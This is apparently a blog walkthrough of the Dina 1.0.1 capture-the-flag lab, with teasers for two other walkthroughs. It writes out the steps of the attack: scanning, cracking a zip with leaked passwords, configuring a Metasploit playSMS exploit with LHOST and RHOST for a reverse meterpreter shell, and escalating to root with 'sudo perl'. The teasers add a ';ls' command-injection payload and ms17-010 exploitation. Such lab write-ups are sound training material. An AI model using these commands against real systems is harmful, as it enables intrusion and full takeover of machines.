CTF - Dina : 1.0.1 walkthrough

    
Lab Environment  :

Attacker’s Machine :
 Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux

Vulnerable Machine : Dina: 1.0.1


Scanning phase
  1. route -n (To know the gateway) i.e 172.16.60.2
  2. arp-scan --local (to know the devices connected to the local network) 
  3. Vulnerable machine IP : 172.16.60.154
    


    Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154
  1. We got one open port i.e 80 and http service is active


Since the port 80 is open and http service is active then we can open the IP in browser.
 

Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154
Now further using dirb for scanning the directories : dirb http://172.16.60.154

Some results are obtained after using dirb . 
  1. Opened the http://172.16.60.154/robots.txt and found something interesting .
  2. I got few directories listed .
 

After checking the directories got to know that there can be something in http://172.16.60.154/nothing .

NOT FOUND ,go back but this is an html page so we can view the page source and it revealed
something really interesting .
I got password list as
#my secret pass
freedom
password
Helloworld
diana
iloveroot

   
      Opened another url which dirb has listed i.e http://172.16.60.154/secure got one zip file named backup.zip
   

      Downloaded the file and extracted it and it gave the prompt to enter the password . 
It looks like its an MP3 file but still i tried to open it in the text editor .
 I further tried the passwords which i got in source code earlier and Password is freedom.
      It revealed username as well as one url i.e /SecreTSMSgatwaylogin
   


   

      On Browsing the above obtained url i got login panel of playsms

   

      I logged in the portal using username which was revealed in that zip file i.e  backup.zip and 
 password is from the same list that was found in source code.
      Username - touhid
      Password - diana
       

       As i got to know that web applicaton is play sms , so i searched for its exploit and found one

       
      After downloading the file i renamed it as playsmscsv and copied it to metasploit-framework > modules > exploits

      Started msfconsole and searched for playsmscsv
           

      I got one result named as playsmscsv .further i ran the command to use the exploit i.e
      use exploit/playsmscsv

      Now exploit is ready to be used . i further explored the parameters needed for exploit to run by typing options

   

       Provided the parameters which was needed for the exploit are as follows :
  1. set PASSWORD diana
  2. set USERNAME touhid
  3. set LHOST 172.16.60.52
  4. set RHOST 172.16.60.154
  5.  set TARGETURI
SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

Now ready to run the exploit by typing exploit and we got the meterpreter session and then further 
entered into the shell by typing shell


Gained the shell and ran two commands to get the access as
  1.  root user and explored the directories further.
  1. Python -c ‘import pty; pty.spawn(“/bin/bash”)’
  2. Sudo perl -e “exec ‘/bin/bash’”

And finally got the flag in the root directory





Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more